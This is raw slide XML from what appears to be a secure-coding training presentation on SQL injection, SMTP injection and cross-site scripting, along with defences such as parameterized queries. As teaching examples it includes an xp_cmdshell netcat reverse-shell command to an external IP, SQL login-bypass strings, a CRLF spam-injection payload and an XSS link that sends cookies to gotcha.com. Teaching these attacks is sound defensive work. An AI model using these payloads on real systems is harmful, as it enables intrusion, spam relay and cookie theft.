              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3984" y="828"/>
              <a:ext cx="1135" cy="444"/>
              <a:chOff x="2384" y="844"/>
              <a:chExt cx="1135" cy="444"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="87071" name="Picture 29" descr="GEL-Bullet-Arrow-MS-r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729" y="904"/>
                <a:ext cx="34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7072" name="Picture 67" descr="SQL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384" y="856"/>
                <a:ext cx="29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7073" name="Group 68"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3104" y="844"/>
                <a:ext cx="415" cy="406"/>
                <a:chOff x="4032" y="1808"/>
                <a:chExt cx="1079" cy="1056"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="87074" name="Picture 69" descr="pc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032" y="1984"/>
                  <a:ext cx="882" cy="8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7075" name="Picture 70" descr="Funny Guy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535" y="1808"/>
                  <a:ext cx="576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522288" y="4354951"/>
            <a:ext cx="7140575" cy="1028700"/>
            <a:chOff x="321" y="2912"/>
            <a:chExt cx="4498" cy="648"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87060" name="Group 44"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="321" y="2912"/>
              <a:ext cx="4498" cy="288"/>
              <a:chOff x="537" y="3608"/>
              <a:chExt cx="4498" cy="288"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="873507" name="Rectangle 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="537" y="3608"/>
                <a:ext cx="287" cy="288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accent6"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                    <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                  </a:rPr>
                  <a:t></a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="87068" name="Rectangle 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="734" y="3611"/>
                <a:ext cx="4301" cy="252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 dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent6"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>exec xp_cmdshell 'c:\nc.exe -v -e cmd.exe 63.45.11.9 31337'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87061" name="Group 78"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="400" y="3116"/>
              <a:ext cx="1135" cy="444"/>
              <a:chOff x="664" y="3604"/>
              <a:chExt cx="1135" cy="444"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="87062" name="Picture 73" descr="GEL-Bullet-Arrow-MS-r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rot="10800000">
                <a:off x="1009" y="3664"/>
                <a:ext cx="34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7063" name="Picture 74" descr="SQL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64" y="3616"/>
                <a:ext cx="29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7064" name="Group 75"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1384" y="3604"/>
                <a:ext cx="415" cy="406"/>
                <a:chOff x="4032" y="1808"/>
                <a:chExt cx="1079" cy="1056"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="87065" name="Picture 76" descr="pc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032" y="1984"/>
                  <a:ext cx="882" cy="8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7066" name="Picture 77" descr="Funny Guy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535" y="1808"/>
                  <a:ext cx="576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87052" name="Group 80"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="876300" y="2399151"/>
            <a:ext cx="7640643" cy="1739900"/>
            <a:chOff x="552" y="1400"/>
            <a:chExt cx="4813" cy="1096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="87054" name="Picture 19" descr="Firew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060" y="1520"/>
              <a:ext cx="640" cy="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055" name="Picture 20" descr="SQL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52" y="1400"/>
              <a:ext cx="740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7056" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3160" y="1420"/>
              <a:ext cx="1079" cy="1056"/>
              <a:chOff x="4032" y="1808"/>
              <a:chExt cx="1079" cy="1056"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="87058" name="Picture 21" descr="pc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4032" y="1984"/>
                <a:ext cx="882" cy="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7059" name="Picture 22" descr="Funny Guy2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35" y="1808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73499" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3910" y="2082"/>
              <a:ext cx="1455" cy="2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chemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>0wns 63.45.11.9</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 89"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1327150" y="2653150"/>
            <a:ext cx="3905250" cy="2184400"/>
            <a:chOff x="836" y="1368"/>
            <a:chExt cx="2460" cy="1376"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="873559" name="Line 87"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1280" y="1368"/>
              <a:ext cx="2016" cy="136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873560" name="Line 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="836" y="2290"/>
              <a:ext cx="1212" cy="45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8086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Manipulation of the SQL query string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-NZ" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Becomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-NZ" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-NZ" alt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71501" y="1981200"/>
            <a:ext cx="821531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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from users where name =‘+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userinput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’+’and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password=‘+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userinput</a:t>
            </a:r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00" y="3005138"/>
            <a:ext cx="8215313" cy="500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NZ" sz="20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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from users where name =‘admin’;--and password=‘anything</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’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NZ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1" y="3995738"/>
            <a:ext cx="8215312" cy="500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NZ" sz="20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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from users where name =‘admin’ and password=‘anything’ or ‘1’=‘1’</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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NZ" sz="20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286500" y="5143500"/>
            <a:ext cx="2214563" cy="1071563"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 23599"/>
              <a:gd name="adj2" fmla="val -10862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Syntax Grouping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" y="4572000"/>
            <a:ext cx="4286250" cy="1928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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(name =‘admin’)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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(and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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	(password=‘anything’)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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	or (‘1’=‘1’)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286500" y="5176837"/>
            <a:ext cx="2214563" cy="1071563"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -111024"/>
              <a:gd name="adj2" fmla="val -1529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Syntax Grouping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10756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r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Use parameterized queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>asp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>, java, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>, python, flex?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Use stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Type cast variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Don’t use dynamic SQL inside procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Often seen in ‘search’ procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>QuoteName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786563" y="2619375"/>
            <a:ext cx="2214562" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -122637"/>
              <a:gd name="adj2" fmla="val -3468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Yes. Of course your flash application can be vulnerable to injection attacks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" y="1619250"/>
            <a:ext cx="8429625" cy="742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DO NOT BUILD SQL STATEMENTS DYNAMICALLY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063" y="5038725"/>
            <a:ext cx="8429625" cy="1285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	SELECT @SQL = 'SELECT * from USERS WHERE NAME ='+ @Username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	EXEC @SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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4324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 bwMode="auto">
          <a:xfrm>
            <a:off x="3206851" y="5410200"/>
            <a:ext cx="2743937" cy="4292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Wrong Code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3215614" y="5334000"/>
            <a:ext cx="2743937" cy="4292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Fixed Code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6076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1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Application Email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631216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Often vulnerable to spam attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>SMTP is a text based protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>CR/LF pairs and new command can be inserted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Normal communication with SMTP server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2428875" y="3429000"/>
            <a:ext cx="3857625" cy="235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Mail From: &lt;feedback@foo.co.nz&gt;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Rcpt To: &lt;user@user.co.nz&gt;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Subject: This is a test email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quit</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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Application Email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261884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Injection through recipient field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>user@user.co.nz&gt;%0a%0drset%0a%0dMail From: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1" smtClean="0"/>
              <a:t>spam@foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Modified communication with SMTP server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2571750" y="2819400"/>
            <a:ext cx="3857625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Mail From: &lt;website@foo.co.nz&gt;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Rcpt To: &lt;user@demo.co.nz&gt;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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rset</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="2000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Mail From: &lt;spam@foo.co.nz&gt;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Rcpt To: &lt;newrecipient@host.co.nz&gt;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Subject: This is a spam email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blah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> spam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="2000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quit</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="2000" b="1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57188" y="3143250"/>
            <a:ext cx="1285875" cy="1500188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 118559"/>
              <a:gd name="adj2" fmla="val -1289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RESET Injected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215188" y="3857625"/>
            <a:ext cx="1714500" cy="1500188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -128476"/>
              <a:gd name="adj2" fmla="val -59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New Details Injected</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30733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 smtClean="0"/>
              <a:t>Cross Site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5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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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449263" y="1598613"/>
            <a:ext cx="5179641" cy="1785104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very common vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An issue in a Web server leads to a compromised client (and more)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The fault is simply trusting input and then echoing it!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11166619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Cross Site Scripting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NZ" dirty="0" smtClean="0"/>
              <a:t>The sending of user supplied input to the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>More than alert()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Reflective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Code passed as a parameter, usually on the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Code stored and then displayed to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defacement/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Site interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Web application worms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6629400" y="2209800"/>
            <a:ext cx="2286000" cy="2000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JavaScript is a powerful programming language </a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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998257"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="449263" y="1598613"/>
          <a:ext cx="8229600" cy="425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6096000" y="1524000"/>
            <a:ext cx="2743200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60903"/>
              <a:gd name="adj2" fmla="val 15833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we need Secure Coding in Code Review ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4067433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XSS in Action: Cookie Stealing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2538652" y="3350358"/>
            <a:ext cx="6151323" cy="1800225"/>
            <a:chOff x="2538652" y="3219734"/>
            <a:chExt cx="6151323" cy="1800225"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3308350" y="3219734"/>
              <a:ext cx="5381625" cy="1800225"/>
              <a:chOff x="3308350" y="3219734"/>
              <a:chExt cx="5381625" cy="1800225"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="Picture 1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08350" y="3219734"/>
                <a:ext cx="5381625" cy="1800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" name="Picture 41" descr="humongousinsurance-com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01321" y="4148317"/>
                <a:ext cx="3717275" cy="142972"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Right Arrow 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2538652" y="3730294"/>
              <a:ext cx="707366" cy="70736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037013" y="1548262"/>
            <a:ext cx="4354512" cy="914400"/>
            <a:chOff x="4037013" y="1417638"/>
            <a:chExt cx="4354512" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rounded Rectangle 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4037013" y="1417638"/>
              <a:ext cx="4354512" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3125"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="40005" dist="20320" dir="5400000" algn="ctr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prstMaterial="matte">
              <a:bevelT w="0" h="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endParaRPr lang="en-US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4085322" y="1459340"/>
              <a:ext cx="4224666" cy="8309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lang="en-US" sz="1600" dirty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Welcome.asp</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty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Hello,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty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1600" dirty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&lt;%= request.querystring(′name′)%&gt;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6818" y="5535875"/>
            <a:ext cx="7896714" cy="1182687"/>
            <a:chOff x="626818" y="5405251"/>
            <a:chExt cx="7896714" cy="1182687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rounded Rectangle 46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="650875" y="5405251"/>
              <a:ext cx="7848600" cy="1182687"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3125"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="40005" dist="20320" dir="5400000" algn="ctr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prstMaterial="matte">
              <a:bevelT w="0" h="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endParaRPr lang="en-US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626818" y="5457985"/>
              <a:ext cx="7896714" cy="10772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&lt;a href=http://</a:t>
              </a:r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www.humongousinsurance.com/welcome.asp?name</a:t>
              </a:r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b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&lt;script&gt;document.write</a:t>
              </a:r>
              <a:b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	(′&lt;img src=″http://gotcha.com/″%2bdocument.cookie%2b&gt;′)</a:t>
              </a:r>
              <a:b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&lt;/script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600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here</a:t>
              </a:r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&lt;/a&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6363448" y="4185980"/>
            <a:ext cx="1625600" cy="3921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127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17763" y="2301628"/>
            <a:ext cx="1018159" cy="1263369"/>
            <a:chOff x="6645275" y="2254128"/>
            <a:chExt cx="1018159" cy="1263369"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
